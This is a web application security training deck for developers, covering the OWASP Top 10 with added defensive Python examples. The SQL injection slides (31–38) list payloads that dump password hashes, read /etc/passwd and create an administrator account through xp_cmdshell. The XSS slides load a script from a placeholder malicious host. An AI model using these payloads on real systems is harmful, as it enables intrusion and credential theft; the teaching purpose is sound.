
Web Application Security Session for Web Developers

502 views

Published on

Web Application Security session conducted by Lightracers Consulting for web developers. In this learning presentation, we will look at - What is Cyber Crime, Types of Cyber crime, What is Cyber Security, Types of Threats, Overview of OWASP, OWASP Top 10 Vulnerabilities (SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Security Misconfiguration, Sensitive Data exposure, etc.) and Protection measures.

Published in: Internet


  1. Web Application Security For Web Developers
  2. Learning Agenda
     • Cyber Crime & Security
     • Web Architecture
     • OWASP Top 10 Vulnerabilities
     • Protection
  3. Information, Technology & Society
     • The Information is the data that is of interest
     • The Technology is used to create, communicate, distribute, manipulate, store or destroy information
     • The technology is any mechanism capable of data processing
     • The Society is a group of people involved in social interaction
     • Becoming socialized means learning what kind(s) of behavior is appropriate in a given situation
     • Society and IT are co-evolving and impact each other
  4. Trends in Digitization
     • Storing social and intellectual interactions
     • Gathering and synthesizing information that was disconnected
     • Higher expectations from technology than from people
  5. Cyber Crime
     • Cyber crimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code/US Federal Law
     • The abuse of computers has also given birth to a gamut of new age crimes that are addressed by Laws
  6. Types of Cyber Crime
     • Hacking (illegal intrusion into a system/network)
     • Denial of Service attack
     • Virus dissemination
     • Cyber Terrorism
     • Software piracy
  7. Purpose of Cyber Crime
     • Financial Fraud
     • Damage to data/system/network
     • Theft of proprietary information
     • System penetration
     • Denial of Service
     • Unauthorized access
     • Abuse of privileges
     • Spreading viruses
  8. What is Cyber Security?
     • Cybersecurity is a subset of information security; the practice of defending data/information (electronic or physical) from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction
     • Shared responsibility between merchants and users
     • Cyber security involves protecting that information by preventing, detecting, and responding to attacks.
     Source: https://en.wikipedia.org/wiki/Information_security
  9. What is Cyber Security?
     • Cyber Security is the set of processes employed to safeguard and secure the assets used to carry an organization's information from being stolen or attacked.
     • It requires extensive knowledge of the possible threats, such as viruses or other malicious objects.
     • Identity management, risk management and incident management form the crux of the cyber security strategies of an organization.
  10. Goals of Cyber Security
     • Confidentiality
       • Making sure that we keep our data and our information private from those who do not “need to know”
     • Integrity
       • Making sure that our data is not tampered with, so that any information we send or receive is accurate and truthful
     • Availability
       • Making sure that we, our clients and anyone else who needs to get to our data is able to easily and securely access it
  11. Why Cyber Security Training?
     • Business Continuity & Trust factor
     • Protection of data and systems
     • Prevention of unauthorized access
     • Safeguarding Personally Identifiable Information
     • Reduces security related risks up to 75%
  12. Map
  13. Popular Hacks
     • Burger King Twitter account (2013)
     • Twitter defaced by Iranian Cyber Army (2009)
     • ESPN site decorated with cute unicorns (2009)
     • Sony Pictures data breach (2011): SQL injection compromised passwords
     • eBay data breach (2014)
     • Many site defacements
  14. Cost of a Breach
  15. Sources of Attacks
     • Virus / Worms / *-wares (Executables)
     • Social Engineering (Phishing)
     • Hackers who are very patient
     • PEOPLE !!
  16. Why web application security?
     • 75% of attacks target the Application layer through the internet (Gartner)
     • 95% of web applications have some sort of vulnerability (Imperva)
     • 78% of easily exploitable weaknesses occur in web applications (Symantec)
     • 67% of websites used to distribute malware are legitimate, compromised websites (Symantec)
  17. Revision of web architecture
     • Setup
       • Firewall
       • Load balancer
       • Webserver (Reverse Proxy)
       • Application (.NET, Java, PHP, Perl)
       • Database (SQL Server, Oracle, MySQL)
  18. Revision of web architecture
     • Development
       • Model
       • View
       • Controller
     • Application Anatomy
       • HTML and JavaScript
       • CRUD Operations
       • External/internal libraries/components
  19. Revision of web architecture
     • Request Methods
       • GET, POST, HEAD, PUT, TRACE, OPTIONS, DELETE
     • HTTP & HTTPS
     • FTP, SFTP
     • SSH
  20. WAPT
     • Web Application Penetration Testing
     • Evaluate computer/server and network security
     • Identify flaws and vulnerabilities
       • Design or implementation flaw
     • Attack possibility
       • SQL Injection, CSRF, XSS, File inclusion, User enumeration
     • Uses negative test data
  21. Open Web Application Security Project
     • Non profit organization and Open Community
     • Purpose: Be the thriving global community that drives visibility and evolution in the safety and security of the world’s software.
     • Website - https://www.owasp.org
  22. OWASP Projects
     • Enterprise Security API (ESAPI)
       • Collection of all the security methods that a developer needs to build a secure web application
     • Zed Attack Proxy (ZAP)
       • Easy to use integrated penetration testing tool for finding vulnerabilities in web applications
     • Security Shepherd
       • CBT application for web and mobile application security awareness and education
     • Development Guide
       • Massive document covering all aspects of web application and web service security
  23. OWASP 2013 Top 10 List
     • A1 - Injection
     • A2 - Broken Authentication and Session Management
     • A3 - Cross-Site Scripting (XSS)
     • A4 - Insecure Direct Object References
     • A5 - Security Misconfiguration
     • A6 - Sensitive Data Exposure
     • A7 - Missing Function Level Access Control
     • A8 - Cross-Site Request Forgery (CSRF)
     • A9 - Using Components with Known Vulnerabilities
     • A10 - Unvalidated Redirects and Forwards
     • (Additional) A6/2007: Information Leakage and Improper Error Handling
     https://www.owasp.org/index.php/Top_10_2013-Top_10
  24. CWE/SANS Top 25 (Rank, Name)
     [1] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
     [2] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
     [3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
     [4] Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
     [5] Missing Authentication for Critical Function
     [6] Missing Authorization
     [7] Use of Hard-coded Credentials
     [8] Missing Encryption of Sensitive Data
     [9] Unrestricted Upload of File with Dangerous Type
     [10] Reliance on Untrusted Inputs in a Security Decision
     [11] Execution with Unnecessary Privileges
     [12] Cross-Site Request Forgery (CSRF)
  25. CWE/SANS Top 25 (Rank, Name), continued
     [13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
     [14] Download of Code Without Integrity Check
     [15] Incorrect Authorization
     [16] Inclusion of Functionality from Untrusted Control Sphere
     [17] Incorrect Permission Assignment for Critical Resource
     [18] Use of Potentially Dangerous Function
     [19] Use of a Broken or Risky Cryptographic Algorithm
     [20] Incorrect Calculation of Buffer Size
     [21] Improper Restriction of Excessive Authentication Attempts
     [22] URL Redirection to Untrusted Site ('Open Redirect')
     [23] Uncontrolled Format String
     [24] Integer Overflow or Wraparound
     [25] Use of a One-Way Hash without a Salt
  26. Primary Protection
     • 4 basic rules for all visible pages
       • Authentication
       • Authorization
       • Validation
       • Sanitization
     • Common approach with exception handling
       • Disable or limit detailed error messages
       • Ensure that secure paths return similar or identical error messages
       • Create a default error handler which sanitizes error messages
     • IDS and IPS
     • Don’t be lazy to check "ALL" !!
  27. Example: Failed login message
     • Compare this message
       • Notice: Username does not exist
       • Notice: Password was not correct
     • With this
       • Notice: Invalid credentials
  28. A1: SQL Injection attack
     • Use special characters to check
       • Quotes, double quotes, slashes, dashes, HTML tags
     • Modern attack techniques are automated
     • Blind condition SQLi
       • Information gathering
       • Error based analysis
       • Output mechanism
     • Understanding the query
       • Determine the database type
       • Find out user access level
       • Determine the OS
  29. A1: SQL Injection attack
  30. A1: SQL Injection attack
  31. A1: SQL Injection attack
     • Finding user privilege level
       • ‘ and 1 in (select user) –-
       • ‘; if user =‘dbo’ wait for delay ‘0:0:5’ –
       • ‘ union select if( user() like ‘root@%’
     • Default admin accounts
       • sa, system, sys, dba, admin, root and many others
  32. A1: SQL Injection attack
     • All tables and columns in one query
       • ‘ union select 0, sysobjects.name + ‘:’ +syscolumns.name + ‘: ‘ + systypes,name, 1, 1,‘1’. 1, 1, 1, 1, 1 from sysobjects, syscolumns,systypes where sysobjects.xtype = ‘U’ ANDsysobjects.id = syscolumns,idANDSyscolumns.xtype = systypes.xtype –
     • File location of databases
       • ‘ and 1 in (select min(filename) from master.dbo.sysdatabases where filename >’.’) –-
     • Getting user names and passwords
       • ‘; begin declare @var varchar(8000) set @var=‘:’ select @var=@var+’ ’+login+’/’+password+’ ‘ from users where login>@var select @var as var into temp end --
  33. A1: SQL Injection attack
     • The hashes are extracted using
       • SELECT password FROM master..sysxlogins
     • Then hex each hash
       • Begin @charvalue=‘0x’, @i=1, @length=datalength(@binvalue), @hexstring = ‘0123456789ABCDEF’ While (@i<=@lenght) BEGIN declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint – (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) Select @i=@i+1 END
     • And then we just cycle through all passwords
  34. A1: SQL Injection attack
     ‘; begin declare @ var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @ int, @length int, @hexstring char(16) set @var=‘:’ select @xdate1=(select min(xdate1) from master.dbo.syslogins where password is not null) begin while @xdate1 <= (select max (xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where Xdate1=@xdate1), @charvalue = ‘0x’, @i=1 @length=datalength( @binvalue), @hextring =‘0123456789ABCDEF’ while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING( @binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - ( @firstint*16) select @charvalue=@charvalue + SUBSTRING ( @hextring,@firstint+1,1) + SUBSTRING ( @hexstring, @secondint+1,1) select @i=@i+1 end select @var=@var+’/ ‘+name+’/’+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@sdate1 and password is not null) end select @var as x into temp end end --
  35. A1: SQL Injection attack
     • Brute forcing passwords
       • create table tempdb..passwords( pwd varchar(255) )
       • bulk insert tempdb..passwords from ‘c:/temp/passwords.txt’
       • select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare(name, sysxlogins.password, 0 ) = 1) union select sysxlogins,name, null from sysxlogins join syslogins on sysxlogins.sid= where sysxlogins.password is null and syslogins.isntgroup=0and syslogins.isntuser=0
       • drop table tempdb..passwords
  36. A1: SQL Injection attack
     • Uploading files (lengthy sql query)
       • ‘declare @hex varchar(8000), bin varchar(8000) select @hex = ‘4d5a900003000... 8000 hex chars ...0000000000000000000’ exec master..sp_hex2bin @hex, @bin output ; insert master..pwdump2 select @bin --
     • Inject binary as hex in 4000 byte chunks
  37. A1: SQL Injection attack
     • MySQL OS Interaction
       • LOAD_FILE
         ‘union select 1,load_file(‘/etc/passwd’),1,1,1;
       • LOAD DATA INFILE
         create table temp( line blob); load date infile ‘/passwd’ into table temp; select * from temp;
       • SELECT INTO OUTFILE
     • Server name and configuration
       • ‘ and 1 in (select @@servername ) –
       • ‘and 1 in (select srvname from master..sysservers )
  38. A1: SQL Injection attack
     • Linux OS based MySQL
       • ‘ union select 1, (load_file(‘/etc/passwd’)),1,1,1;
     • MS SQL Windows Password Creation
       • ‘ exec xp_cmdshell ‘net user /add victor Pass123’—
       • ‘;exec xp_cmdshell ‘net localgroup /add administrators victor’ –
     • Stopping OS Services
       • ‘; exec master..xp_servicecontrol ‘ start’, FTP Publishing’ --
  39. A1: SQL Injection - Protection
     • Escape special characters
     • Validate input data types
     • Avoid plain string concatenation
     • Use prepared statements
     • Enforce least privileges for the application's database user
     • Perform whitelist input validation on all input
     • Allow only data of the expected length
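The protection slide above lists the measures without showing them in code. The following is an added example (not part of the Lightracers presentation) that puts three of them side by side in Python against an in-memory SQLite table constructed here: the concatenated query the slide warns against, the same lookup as a prepared statement, a whitelist check on the login parameter, and a query-only connection standing in for a least-privilege database user. The table, rows, the `users` schema and the regular expression are all assumptions made for the example.

```python
import re
import sqlite3


def make_db():
    """Build an in-memory SQLite table with constructed sample rows
    (the data is made up for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("dba", "admin")],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn, login):
    """Vulnerable: plain string concatenation puts the input inside the SQL text,
    so a quote in the input changes the structure of the query."""
    sql = "SELECT login, role FROM users WHERE login = '" + login + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, login):
    """Prepared statement: the value travels as a bound parameter, never as SQL,
    so a quote in the input is just one character of the login being looked up."""
    return conn.execute(
        "SELECT login, role FROM users WHERE login = ?", (login,)
    ).fetchall()


# Whitelist validation: accept only the shape a login is expected to have, with a
# bounded length, and reject everything else before it gets near the query.
LOGIN_RE = re.compile(r"[a-z0-9_]{1,32}")


def is_valid_login(login):
    return LOGIN_RE.fullmatch(login) is not None


def make_readonly(conn):
    """Least privilege, SQLite-style: a query-only connection cannot modify data,
    so even a successful injection through it cannot change or drop tables.
    (On a server database you would grant the application user SELECT only.)"""
    conn.execute("PRAGMA query_only = 1")
    return conn


def write_blocked(conn):
    """Return True if the connection refuses a write."""
    try:
        conn.execute("DELETE FROM users")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Constructed test input: a closing quote followed by an always-true condition.
    payload = "' OR '1'='1"
    print("unsafe:", find_user_unsafe(db, payload))   # every row comes back
    print("safe:  ", find_user_safe(db, payload))     # no row has that literal login
    print("valid login?", is_valid_login(payload))    # False
    print("write blocked?", write_blocked(make_readonly(make_db())))
```

Run it and compare the two result lists: the concatenated query returns the whole table, the prepared statement returns nothing, and the whitelist rejects the input before either query would run.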
  40. A2: Broken Authentication
     • Exposure of SESSION ID
     • Considering SESSION ID's data acceptable
     • Pages without authorization checks
     • Not confirming user actions
     • Not HTTPS? Beware !!
  41. A2: Broken Authentication - Protection
     • Centralized & standardized authentication
     • Use the standard session ID of your container
     • Protect credentials and Session ID with SSL/TLS
     • Keep your SSL certificate safe
     • Automatically log out inactive sessions
     • Use supplemental authentication (OTP, Captchas, etc)
     • Expire/remind old passwords and have a strong password policy
     https://howsecureismypassword.net/
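Slides 27 and 41 together describe a login that gives one generic failure message, keeps credentials protected and logs out idle sessions. The following is an added Python example, not code from the presentation, that implements those points in one place: the "Invalid credentials" message from slide 27 for both unknown users and wrong passwords, a salted and iterated password hash (PBKDF2-HMAC-SHA256, chosen here; the slides do not name a scheme), a constant-time comparison, a random session ID, and an idle timeout. The user store, session store, iteration count, timeout and sample credentials are all constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000          # PBKDF2 work factor; raise it on production hardware
IDLE_TIMEOUT = 15 * 60        # seconds of inactivity after which a session is dropped
GENERIC_FAILURE = "Invalid credentials"

# Constructed in-memory stores standing in for the user table and session store.
USERS = {}      # login -> (salt, pbkdf2 digest)
SESSIONS = {}   # session id -> {"user": login, "last_seen": timestamp}


def hash_password(password, salt=None):
    """Salted, iterated hash. A fresh random salt per user means two users with
    the same password do not end up with the same stored value."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def register(login_name, password):
    USERS[login_name] = hash_password(password)


def login(login_name, password, now):
    """Return (session_id, None) on success or (None, message) on failure.
    The message is identical whether the user is unknown or the password is wrong."""
    record = USERS.get(login_name)
    if record is None:
        # Do the same amount of hashing work for unknown users so that response
        # time does not reveal which logins exist.
        hash_password(password, b"\x00" * 16)
        return None, GENERIC_FAILURE
    salt, stored = record
    _, candidate = hash_password(password, salt)
    if not hmac.compare_digest(candidate, stored):   # constant-time comparison
        return None, GENERIC_FAILURE
    return new_session(login_name, now), None


def new_session(user, now):
    """Session id from a CSPRNG, long enough that guessing one is infeasible."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "last_seen": now}
    return sid


def session_user(sid, now):
    """Resolve a session id to its user, expiring sessions idle longer than IDLE_TIMEOUT."""
    session = SESSIONS.get(sid)
    if session is None:
        return None
    if now - session["last_seen"] > IDLE_TIMEOUT:
        del SESSIONS[sid]            # automatic logout of an inactive session
        return None
    session["last_seen"] = now
    return session["user"]


if __name__ == "__main__":
    register("alice", "correct horse battery staple")     # constructed credentials
    print(login("alice", "wrong password", now=1000))     # (None, 'Invalid credentials')
    print(login("nobody", "anything", now=1000))          # (None, 'Invalid credentials')
    sid, err = login("alice", "correct horse battery staple", now=1000)
    print(session_user(sid, now=1500))                    # alice
    print(session_user(sid, now=1500 + IDLE_TIMEOUT + 1)) # None: idle too long
```

Timestamps are passed in explicitly so the timeout can be exercised without waiting; in a real application `now` would be the current time on each request.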
  42. A3: Cross Site Scripting (XSS)
     • Code in text field
     • "Every" web application has this problem
     • By-passed client side validations
     • Two types
       • Reflected XSS
       • Stored XSS
  43. A3: Cross Site Scripting (XSS)
     • Query:
       • http://vulnerable.com/search/my+search
     • Result:
       • ...<body> <p>Search results for <strong>my search</strong></p> ...
     • Query:
       • http://vulnerable.com/search/<script src=http://malicious.com/script.js></script>
     • Result:
       • ... <p>Search results from <strong><script src=http://malicious.com/script.js></script></p> ...
  44. A3: Cross Site Scripting (XSS)
     • If an attacker submits a comment
       • <script>alert(‘Hello Victim!’);</script>
     • The result may look like
       • <div class=comments> <div>This post is awesome!</div> <div><script>alert(‘Hello Victim!’);</script></div>
     • Embedded binaries are possible
       • data:’text/html;base64,PHNjcmlwdD5hbGVydCgiSGkgdGhlcmUgOlAiKTs8L3NjcmlwdD4=
  45. A3: Cross Site Scripting (XSS) - Protection
     • Don’t include input in your output “as it is”
     • Perform whitelist input validation
     • Escape special characters
     • Use a Sanitizer (consider OWASP HTML Sanitizer)
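To show the difference between including input "as it is" and escaping it, here is an added Python example (not from the presentation) built around the comment from slide 44. It renders the comment both ways and adds a small allow-list sanitizer for fields that must keep some formatting: only `<b>`, `<i>` and `<p>` survive, every attribute is dropped, and all text is escaped. The sanitizer is an illustration of the idea behind a library such as the OWASP HTML Sanitizer the slide mentions, not that library's code; the allowed-tag set and the sample comment are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed comment, modelled on the slide's example of a script in a text field.
ATTACKER_COMMENT = "<script>alert('Hello Victim!');</script>"


def render_comment_unsafe(comment):
    """Vulnerable: the input is included in the output as it is."""
    return "<div>" + comment + "</div>"


def render_comment_safe(comment):
    """Escape the characters with meaning in HTML (& < > \" ') so the browser
    displays the text instead of executing it."""
    return "<div>" + html.escape(comment, quote=True) + "</div>"


# Tags allowed to pass through the sanitizer; everything else is dropped.
ALLOWED_TAGS = {"b", "i", "p"}


class AllowlistSanitizer(HTMLParser):
    """Keep only allowed tags (without attributes) and escape all text content."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append("<%s>" % tag)     # attributes deliberately discarded

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Entities were decoded by the parser; escaping here re-encodes them,
        # so "&lt;script&gt;" cannot be smuggled through as a tag.
        self.out.append(html.escape(data, quote=True))


def sanitize(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))   # script tag reaches the browser
    print(render_comment_safe(ATTACKER_COMMENT))     # &lt;script&gt;... shown as text
    print(sanitize('<b onclick="evil()">bold</b> text'))   # <b>bold</b> text
    print(sanitize(ATTACKER_COMMENT))                # alert(&#x27;Hello Victim!&#x27;);
```

Escaping is the default; the sanitizer is only for the few fields where users are allowed some markup, and its allow-list should stay as short as the feature permits.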
  46. A4: Insecure Direct Object Reference
     • Failure to restrict URL access
     • Hiding object references in hidden fields
     • Giving access control to the presentation layer
     • Exposing unauthorized files/data
     • E.g. https://accounts.mycompany.com/download?file=payslips/payslip_112233.pdf
  47. A4: Insecure Direct Object Reference - Protection
     • Verify parameter value format
     • Eliminate Direct Object references
     • Use Access reference maps
       • E.g. https://accounts.mycompany.com/download?file=K62a8129
     • Verify user authorization to access the target object
     • Verify the requested mode on the target object (read, write, delete, etc)
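The payslip download from slides 46 and 47 can be protected by the access reference map the slide describes, plus the format, authorization and mode checks it lists. The following is an added Python example, not the presentation's code, of a per-session map that hands out random tokens in place of file paths and of a download handler that applies the checks in order. The ownership table, the token format and the HTTP-style status codes are assumptions made for the example.

```python
import re
import secrets

# Constructed ownership table: which user each stored file belongs to.
PAYSLIPS = {
    "payslips/payslip_112233.pdf": "alice",
    "payslips/payslip_445566.pdf": "bob",
}

# Only "read" is permitted on payslips; the check is explicit rather than implied.
ALLOWED_MODES = {"read"}

# A token from secrets.token_urlsafe(8) is exactly 11 URL-safe characters.
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{11}")


class ReferenceMap:
    """Per-session access reference map: random tokens travel in the URL,
    the real paths stay on the server."""

    def __init__(self):
        self._to_indirect = {}
        self._to_direct = {}

    def indirect(self, direct_ref):
        if direct_ref not in self._to_indirect:
            token = secrets.token_urlsafe(8)
            self._to_indirect[direct_ref] = token
            self._to_direct[token] = direct_ref
        return self._to_indirect[direct_ref]

    def direct(self, indirect_ref):
        return self._to_direct.get(indirect_ref)


def download_links(ref_map, user):
    """Links shown to the user: one token per file they own."""
    return [ref_map.indirect(path) for path, owner in PAYSLIPS.items() if owner == user]


def download(ref_map, user, indirect_ref, mode="read"):
    """Return an HTTP-style status for a download request, checking in order:
    parameter format, map lookup, ownership of the target object, requested mode."""
    if TOKEN_RE.fullmatch(indirect_ref) is None:
        return 400      # malformed parameter (a raw path, for instance)
    path = ref_map.direct(indirect_ref)
    if path is None:
        return 404      # not a reference this session handed out
    if PAYSLIPS.get(path) != user:
        return 403      # authorization on the target object, never skipped
    if mode not in ALLOWED_MODES:
        return 403      # mode not permitted on this object type
    return 200


if __name__ == "__main__":
    alice_map = ReferenceMap()
    token = download_links(alice_map, "alice")[0]
    print("alice reads her own payslip:", download(alice_map, "alice", token))     # 200
    print("alice tries to delete it:", download(alice_map, "alice", token, "delete"))  # 403
    print("bob reuses alice's token:", download(alice_map, "bob", token))          # 403
    print("raw path in the parameter:", download(alice_map, "alice", "payslips/payslip_445566.pdf"))  # 400
```

The map hides the reference, but the ownership check is what actually protects the file: even if a token leaks, the handler still compares the resolved object's owner with the requesting user.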
  48. A5: Security Misconfiguration
     • Is your source code really secret?
     • Is your database access restricted?
     • Is your server hardened?
  49. A5: Security Misconfiguration
     • Missing OS/Server patches
     • Flaws in non-upgraded application patches
     • Unauthorized access to functionality/data
     • Insider threat
  50. A5: Security Misconfiguration - Protection
     • Verify systems’ configuration management
     • Is "Hardening" done?
     • Update/upgrade dependent software libraries
     • Deactivate unnecessary ports, services, accounts, sites, etc.
     • Scan regularly
  51. A6: Sensitive Data Exposure
     • Failure to identify source and destination of sensitive data
     • Attackers extract secrets to use in additional attacks
     • Impact on cleaning up the incident
     • Storing plain passwords in code
     • Usage of weak algorithms: MD5, SHA-1, RC3, RC4
  52. A6: Sensitive Data Exposure - Protection
     • Identify all sensitive data and their locations
     • Use AES, RSA, SHA-256
     • Generate, distribute and protect keys and change them often
     • Verify your implementation !!
     • Be careful with unknown networks: Hotspots, Free WiFi zones, Internet cafes, etc.
  53. A7: Missing Function Level Access Control
     • Attackers invoke actions they are not authorized for
     • Performing privileged actions
  54. A7: Missing Function Level Access Control - Protection
     • Restrict access to authenticated users
     • Enforce user or role based permissions
     • Disallow requests to unauthorized page types: config, log, source files, etc.
  55. A8: Cross Site Request Forgery
     • Tricking the browser into loading a vulnerable URL
     • Browsers include authentication data in each request
     • Impact: Access sensitive data and change account details
     • Sites relying only on credentials are vulnerable
     • XSS plays well with CSRF
  56. A8: Cross Site Request Forgery - Protection
     • Use CSRF Tokens
     • Store the token in the session and validate the posted token
     • Implement XSS protection
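The token scheme in the slide above, shown as an added Python example that is not part of the presentation: a token is generated per session and stored server-side, embedded in the form, and compared in constant time when the form is posted. A request that only carries the session cookie, which is all a cross-site page can make the victim's browser send, is rejected. The session store, the change-email form and the status codes are constructed for the example.

```python
import hmac
import secrets

SESSIONS = {}   # constructed session store: session id -> session data


def start_session(user):
    """Create a session together with a per-session CSRF token kept server-side."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def session_token(sid):
    return SESSIONS[sid]["csrf_token"]


def render_change_email_form(sid):
    """The form embeds the token; the same-origin policy stops another site from
    reading this page, so the token never reaches a forging page."""
    token = session_token(sid)
    return (
        '<form method="post" action="/account/email">'
        + '<input type="hidden" name="csrf_token" value="%s">' % token
        + '<input type="email" name="email"><button>Change</button></form>'
    )


def handle_change_email(sid, form):
    """Server side of the POST. The session cookie alone is not enough:
    the posted token must match the one stored in that session."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401                                  # not logged in
    posted = form.get("csrf_token", "")
    if not hmac.compare_digest(posted, session["csrf_token"]):
        return 403                                  # missing or wrong token
    session["email"] = form["email"]
    return 200


def forged_request(sid):
    """What a cross-site page can cause the browser to send: the browser attaches
    the session cookie automatically, but the attacker cannot supply the token."""
    return handle_change_email(sid, {"email": "attacker@example.invalid"})


if __name__ == "__main__":
    sid = start_session("alice")
    print(render_change_email_form(sid))
    print("forged request:", forged_request(sid))                                   # 403
    print("legitimate:", handle_change_email(
        sid, {"csrf_token": session_token(sid), "email": "alice@example.invalid"}))  # 200
```

The third bullet of the slide matters here: an XSS flaw on the same origin can read the form and its token, so the token only holds up when output is escaped as described under A3.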
  57. A9: Using known vulnerable components
     • Attackers identify the weak component and customize the attack
     • Libraries/framework components which are not trusted
  58. A9: Using known vulnerable components - Protection
     • Identify components, versions and dependencies
     • Monitor the activity of these components
     • Update them regularly
     • Restrict use of unapproved components
  59. A10: Unvalidated redirects and forwards
     • Common usage of URL redirects attaching input data
     • Forwarding with parameters skipping authentication
  60. A10: Unvalidated redirects and forwards - Protection
     • Avoid using redirects
     • Don’t involve user parameters to define the target URL
     • Whitelist parameter types and destination URLs
     • Verify the access of the user before forwarding
     • Check user access on all pages
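An added Python example, not taken from the presentation, for the three checks the slide asks for: a redirect parameter that names an allow-listed destination instead of carrying a URL, a validator for the cases where a URL-valued parameter cannot be avoided (it resolves the value against the site and checks scheme and host, so protocol-relative `//host` values, userinfo tricks and look-alike hosts fall through to a default), and a forward that verifies the user's role for the target page first. The host is the one from the slides' example URLs; the destination table, roles and pages are assumptions.

```python
from urllib.parse import urljoin, urlsplit

SITE = "https://accounts.mycompany.com/"        # host from the slides' example URLs
ALLOWED_HOSTS = {"accounts.mycompany.com"}     # destination hosts the application accepts
DEFAULT = "/home"

# Named destinations: the parameter selects a key, never a URL.
DESTINATIONS = {"home": "/home", "settings": "/settings", "payslips": "/payslips"}

# Which roles may reach which page; consulted before any forward.
PAGE_ROLES = {"/settings": {"user", "admin"}, "/admin/users": {"admin"}}


def redirect_by_name(name):
    """Preferred form: the parameter is an index into an allow-list."""
    return DESTINATIONS.get(name, DEFAULT)


def safe_redirect_target(next_param):
    """Validate a URL-valued parameter against the allow-list of hosts.
    Resolving relative to SITE first turns '//evil' and bare paths into absolute
    URLs that can be checked uniformly; CR, LF and backslash are rejected outright
    (header injection, and browsers treating backslash as slash)."""
    if any(ch in next_param for ch in "\r\n\\"):
        return DEFAULT
    candidate = urljoin(SITE, next_param)
    try:
        parts = urlsplit(candidate)
        port = parts.port                     # raises ValueError on a malformed port
    except ValueError:
        return DEFAULT
    if parts.scheme != "https":
        return DEFAULT                        # blocks javascript:, data:, http: targets
    if parts.hostname not in ALLOWED_HOSTS or parts.username or port:
        return DEFAULT                        # look-alike hosts, user@host, explicit ports
    return candidate


def forward(role, page):
    """Server-side forward: check the user's access to the target page first, so a
    forward cannot be used to skip the page's own authorization check."""
    if role in PAGE_ROLES.get(page, set()):
        return page
    return None


if __name__ == "__main__":
    for value in ["/settings", "//evil.example/phish", "javascript:alert(1)",
                  "https://accounts.mycompany.com@evil.example/"]:
        print(repr(value), "->", safe_redirect_target(value))
    print("user forwarding to /admin/users:", forward("user", "/admin/users"))   # None
```

Of the two redirect helpers, `redirect_by_name` is the one to reach for; `safe_redirect_target` exists for legacy parameters that already carry URLs, and its allow-list should be kept to the hosts the application genuinely needs.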
  61. Secure Software Development Lifecycle
     • Consider security aspects when designing the solution
     • Understand common vulnerabilities
     • Write clean code
     • Perform code security scans & code reviews
     • Never trust any user input !!
     • Perform penetration tests
  62. OWASP Zed Attack Proxy
     • Open source blackbox security scanner
     • Free and Easy to use
     • Ideal for beginners and professionals
     • Cross platform (Java)
     • Intended for developers
  63. ZAP features
     • Intercepting proxy
     • Active and Passive scanners
     • Spiders (for HTML and Ajax)
     • Report generation
     • Brute force
     • Session Awareness
     • API (clients exist for Java, Python, Node.js, PHP)
  64. WAPT Software
     • Web proxy
       • BURP
       • Paros
       • Webscarab
     • Fuzzing
       • WS Fuzzer
     • Scanners
       • W3AF
       • Zap
  65. Best Practices
     • Embed security measures while coding
     • Filter and sanitize input data
     • Encrypt sensitive files
     • Report any potential breach
     • Never let someone have access to your system with your credentials
     • Always log off or lock your system if you leave (even for a minute)
  66. Conclusion
     • Web applications are always under attack
     • Protect your company information, assets & your information
     • New threats will emerge with technology advancements
     • Get Informed & Get Involved
     • Trust your instincts: If something feels wrong, it is. Report the issues and ask for help if necessary
     • Be an advocate for security … speak up!
  67. Glossary
     • Access Point
     • Asset
     • Adware
     • Algorithm
     • Attack
     • Availability
     • Authentication
     • Authorization
     • Backdoor
     • Botnet
     • Brute force Attack
     • Cryptography
     • Cyberwar
     • Compliance
     • Data Leakage
     • DoS, DDoS
     • Digital Certificate
     • Encryption
     • Evidence
     • Exploit
     • Firewall
     • Forensics
     • Freeware
     • Governance
     • Hardening
     • Hijack
     • HTTP/HTTPS
